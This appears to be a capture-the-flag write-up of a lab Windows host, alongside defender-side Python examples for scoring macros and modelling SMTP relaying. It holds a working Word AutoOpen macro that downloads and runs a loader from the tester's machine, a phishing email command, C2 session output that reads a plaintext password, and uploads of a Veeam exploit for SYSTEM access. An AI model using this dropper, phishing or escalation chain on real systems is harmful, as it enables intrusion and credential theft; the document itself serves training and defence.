22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds? syn-ack ttl 127
1063/tcp open rpcbind syn-ack ttl 127
2049/tcp open rpcbind syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Service enumeration
SMTP
The SMTP service is an open relay, meaning any unauthenticated user can send email through it.
❯ nmap -p25 -Pn --script smtp-open-relay 10.10.95.231
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 15:34 EDT
Nmap scan report for 10.10.95.231
Host is up (0.16s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
HTTPS (www.job2.vl)
Possible attack path: the page at www.job2.vl reads, "If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document. We look forward to hearing from you!"
Initial Access
During the assessment, the tester configured a Sliver server and generated a beacon named http-vulnlabs-4444.exe for use throughout the assessment.
Setting up Macro for MS Word
An AV engine was found running on the system and blocking the tester's payloads. The tester used the "Bypass AV/EDR via DInvoke + Sliver" technique to evade it and obtain a reverse shell.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub
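From the defender's side, the macro above is the classic download-and-execute dropper pattern, and it is exactly the kind of content a mail gateway or an analyst should triage before a document reaches a mailbox. The following is an added example, not code from the write-up or from any product: a small static triage that scores VBA source against a handful of indicators and extracts the URL and file path it references for blocking and hunting. The sample input is the macro shown in this section, embedded as text so the scan runs offline; the indicator names, weights and verdict thresholds are this example's own heuristics.

```python
import re
from typing import Dict, List

# Constructed sample input: the AutoOpen macro shown above, embedded as text so the
# triage runs offline. The indicator set and weights are this example's own heuristics,
# not those of any particular product.
SAMPLE_VBA = r'''Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long
Sub AutoOpen()
    URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub'''

# A harmless macro for comparison (constructed).
BENIGN_VBA = r'''Sub BoldHeadings()
    Selection.Font.Bold = True
End Sub'''

# (name, weight, pattern). VBA is case-insensitive, so every pattern is matched that way.
INDICATORS = [
    ("auto_exec", 2, r"\b(AutoOpen|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b"),
    ("win32_declare", 1, r"\bDeclare\s+(PtrSafe\s+)?Function\b"),
    ("download_api", 3, r"\bURLDownloadToFile\w*\b"),
    ("exec_api", 3, r"\b(WinExec|ShellExecute\w*|CreateProcess\w*|Shell)\b"),
    ("url_literal", 1, r"https?://"),
    ("exe_dropped", 1, r'\.exe"'),
    # C:\Windows\System32\spool\drivers\color is writable by standard users, which is why
    # droppers favour it when they want a file that lives under C:\Windows.
    ("writable_windows_dir", 2, r"spool\\drivers\\color"),
]


def triage_vba(source: str) -> Dict[str, object]:
    """Score VBA source against the indicator list and return a verdict."""
    hits = [name for name, _, pat in INDICATORS if re.search(pat, source, re.IGNORECASE)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    # Auto-execution combined with a download or a process launch is the dropper
    # pattern and is called out regardless of score; the score decides the rest.
    if "auto_exec" in hits and {"download_api", "exec_api"} & set(hits):
        verdict = "malicious"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": hits, "score": score, "verdict": verdict}


def _dedupe(items: List[str]) -> List[str]:
    return list(dict.fromkeys(items))


def extract_iocs(source: str) -> Dict[str, List[str]]:
    """Pull URLs and Windows paths out of the source for blocking and hunting."""
    urls = re.findall(r'https?://[^\s"]+', source)
    paths = re.findall(r'[A-Za-z]:\\[^\s"]+', source)
    return {"urls": _dedupe(urls), "paths": _dedupe(paths)}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(label, triage_vba(src))
    print(extract_iocs(SAMPLE_VBA))
```

The URL and drop path the scanner returns are the two things worth acting on immediately: the URL goes on the proxy block list and the path becomes a file-creation hunt across endpoints. Blocking macro-enabled Word attachments at the gateway removes this delivery step entirely.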
Sending the malicious file via the sendemail tool
❯ sendemail -t hr@job2.vl -f john.smith@gmail.com -a pay.doc -u "Subject: Appliction Resume" -s 10.10.89.165 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
May 06 18:25:35 kali sendemail[185144]: Message input complete.
May 06 18:25:35 kali sendemail[185144]: DEBUG => Connecting to 10.10.89.165:25
May 06 18:25:35 kali sendemail[185144]: DEBUG => My IP address is: 10.8.5.48
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 220 JOB2 ESMTP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: EHLO kali
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250-JOB2, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: MAIL FROM:<john.smith@gmail.com>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: RCPT TO:<hr@job2.vl>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: DATA
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 354 OK, send.
May 06 18:25:36 kali sendemail[185144]: INFO => Sending message body
May 06 18:25:36 kali sendemail[185144]: Setting content-type: text/plain
May 06 18:25:36 kali sendemail[185144]: DEBUG => Sending the attachment [pay.doc]
May 06 18:25:38 kali sendemail[185144]: SUCCESS => Received: 250 Queued (1.484 seconds)
May 06 18:25:38 kali sendemail[185144]: Email was sent successfully! From: <john.smith@gmail.com> To: <hr@job2.vl> Subject: [Subject: Appliction Resume] Attachment(s): [pay.doc] Server: [10.10.89.165:25]
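Two separate weaknesses show up in the SMTP section above and the transcript just shown, and it helps to keep them apart: the open relay (nmap's 8/16 result) is the server accepting mail for foreign recipients from unauthenticated clients, while the phishing delivery to hr@job2.vl is ordinary inbound mail for a local domain and would be accepted by a correctly configured server too. The following added example (not the write-up's code and not hMailServer's) models the RCPT TO decision with the weak and the correct policy side by side, replays the client side of the transcript above, and runs the simplest form of the relay probe. The JOB2 banner and the job2.vl domain are taken from the transcript only so the exchange reads the same way.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed model of the relay decision an SMTP server makes on RCPT TO.
# It is not hMailServer's code; the banner and the job2.vl domain come from
# the transcript above purely so the exchange reads the same way.
LOCAL_DOMAINS = {"job2.vl"}
ADDR_RE = re.compile(r"<([^>]*)>")


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower()


@dataclass
class SmtpSession:
    open_relay: bool                 # weak setting: relay for any unauthenticated client
    authenticated: bool = False
    mail_from: Optional[str] = None
    accepted: List[str] = field(default_factory=list)

    def rcpt_allowed(self, rcpt: str) -> bool:
        if domain_of(rcpt) in LOCAL_DOMAINS:
            return True              # inbound mail for a local mailbox is always accepted
        if self.authenticated:
            return True              # relay to foreign domains only for authenticated submission
        return self.open_relay       # an open relay says yes to everyone else as well

    def handle(self, line: str) -> str:
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "EHLO":
            return "250-JOB2 250-SIZE 20480000 250-AUTH LOGIN 250 HELP"
        if verb == "AUTH":
            # Credential checking is out of scope; this models a successful AUTH LOGIN.
            self.authenticated = True
            return "235 Authentication succeeded"
        if verb == "MAIL":
            m = ADDR_RE.search(arg)
            if not m:
                return "501 Syntax error in parameters"
            self.mail_from = m.group(1)
            return "250 OK"
        if verb == "RCPT":
            m = ADDR_RE.search(arg)
            if not m or self.mail_from is None:
                return "503 Bad sequence of commands"
            if self.rcpt_allowed(m.group(1)):
                self.accepted.append(m.group(1))
                return "250 OK"
            return "550 Relaying not allowed"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Command not recognized"


def run(commands: List[str], open_relay: bool) -> List[Tuple[str, str]]:
    """Feed a client's command lines to a fresh session; return (command, reply) pairs."""
    session = SmtpSession(open_relay=open_relay)
    return [(c, session.handle(c)) for c in commands]


# The client side of the sendemail transcript above: external sender, local recipient.
PHISH_TRANSCRIPT = [
    "EHLO kali",
    "MAIL FROM:<john.smith@gmail.com>",
    "RCPT TO:<hr@job2.vl>",
]

# The simplest form of the check nmap's smtp-open-relay script performs: foreign
# sender, foreign recipient, no AUTH. A 250 on RCPT means the server will relay.
RELAY_PROBE = [
    "EHLO probe",
    "MAIL FROM:<sender@external.example>",
    "RCPT TO:<recipient@elsewhere.example>",
]


def is_open_relay(open_relay_setting: bool) -> bool:
    return run(RELAY_PROBE, open_relay_setting)[-1][1].startswith("250")


if __name__ == "__main__":
    for setting in (True, False):
        print(f"open_relay={setting}: relays for strangers = {is_open_relay(setting)}")
        for cmd, reply in run(PHISH_TRANSCRIPT, setting):
            print(f"  C: {cmd}\n  S: {reply}")
```

Running it shows that closing the relay changes the probe's answer but not the phishing mail's: hr@job2.vl is a local mailbox, so the message from a claimed gmail.com sender is still accepted. The controls for that step are SPF/DKIM/DMARC evaluation of the sender domain on inbound mail and attachment filtering at the gateway; the relay fix only stops the server from being used to spam third parties.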
Lateral movement to Ferdinand
Performing Situational Awareness
sliver (http-vulnlabs-4444) > sa-whoami
[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:
UserName SID
====================== ====================================
JOB2\Julian S-1-5-21-3935782767-3829597994-1046841959-1000
GROUP INFORMATION Type SID Attributes
================================================= ===================== ============================================= ==================================================
JOB2\None Group S-1-5-21-3935782767-3829597994-1046841959-513 Mandatory group, Enabled by default, Enabled group,
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group,
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group,
Privilege Name Description State
============================= ================================================= ===========================
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
sliver (http-vulnlabs-4444) >
sliver (http-vulnlabs-4444) > ls
C:\Progra~2 (25 items, 174 B)
=============================
drwxrwxrwx AWS SDK for .NET <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx AWS Tools <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx Common Files <dir> Wed May 03 18:47:14 +0000 2023
-rw-rw-rw- desktop.ini 174 B Sat May 08 08:18:31 +0000 2021
drwxrwxrwx hMailServer <dir> Wed May 03 13:48:57 +0000 2023
drwxrwxrwx Internet Explorer <dir> Wed Dec 15 04:19:46 +0000 2021
drwxrwxrwx LINQPad5 <dir> Wed May 03 14:05:02 +0000 2023
drwxrwxrwx Microsoft <dir> Thu Aug 19 06:41:12 +0000 2021
drwxrwxrwx Microsoft Office <dir> Wed May 03 15:15:38 +0000 2023
drwxrwxrwx Microsoft OneDrive <dir> Tue May 02 21:20:00 +0000 2023
drwxrwxrwx Microsoft SQL Server <dir> Wed May 03 18:15:45 +0000 2023
drwxrwxrwx Microsoft SQL Server Compact Edition <dir> Wed May 03 14:08:26 +0000 2023
drwxrwxrwx Microsoft Synchronization Services <dir> Wed May 03 13:49:01 +0000 2023
drwxrwxrwx Microsoft Visual Studio 14.0 <dir> Wed May 03 18:11:58 +0000 2023
drwxrwxrwx Microsoft.NET <dir> Wed May 03 18:15:54 +0000 2023
drwxrwxrwx MSBuild <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Reference Assemblies <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Veeam <dir> Wed May 03 18:47:42 +0000 2023
drwxrwxrwx Windows Defender <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Mail <dir> Wed Mar 15 06:46:55 +0000 2023
drwxrwxrwx Windows Media Player <dir> Wed Jul 13 08:03:39 +0000 2022
drwxrwxrwx Windows NT <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Photo Viewer <dir> Thu Feb 10 00:28:44 +0000 2022
drwxrwxrwx Windows Sidebar <dir> Sat May 08 08:34:49 +0000 2021
drwxrwxrwx WindowsPowerShell <dir> Sat May 08 08:34:49 +0000 2021
sliver (http-vulnlabs-4444) >
LINQPad 5 is a powerful software utility specifically designed for .NET Framework 4.6 development, allowing developers to interactively query SQL databases and write C# code without needing a full IDE.
hMailServer is a free, open source, e-mail server for Microsoft Windows. It's used by Internet service providers, companies, governments, schools and enthusiasts in all parts of the world.
Veeam is a software company specializing in data protection, backup, and disaster recovery solutions for various workloads, including virtual, physical, cloud-based, and SaaS environments.
Discovering credentials on Julian's Desktop
sliver (http-vulnlabs-4444) > ls
C:\Users\Julian\Desktop (3 items, 2.8 KiB)
==========================================
-r--r--r-- creds.txt 39 B Wed May 03 15:38:10 +0000 2023
-rw-rw-rw- desktop.ini 282 B Wed May 03 16:28:26 +0000 2023
-rw-rw-rw- Word 2016.lnk 2.5 KiB Thu May 04 10:43:29 +0000 2023
sliver (http-vulnlabs-4444) > cat creds.txt
Mailserver Administrator: MailAdm1n2023
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/VeeamHax.exe
[*] Wrote file to C:\Temp\VeeamHax.exe
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Interaction.MountService.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Interaction.MountService.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Model.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Model.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Common.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Common.dll
Exploiting the vulnerability to obtain a shell as NT AUTHORITY\SYSTEM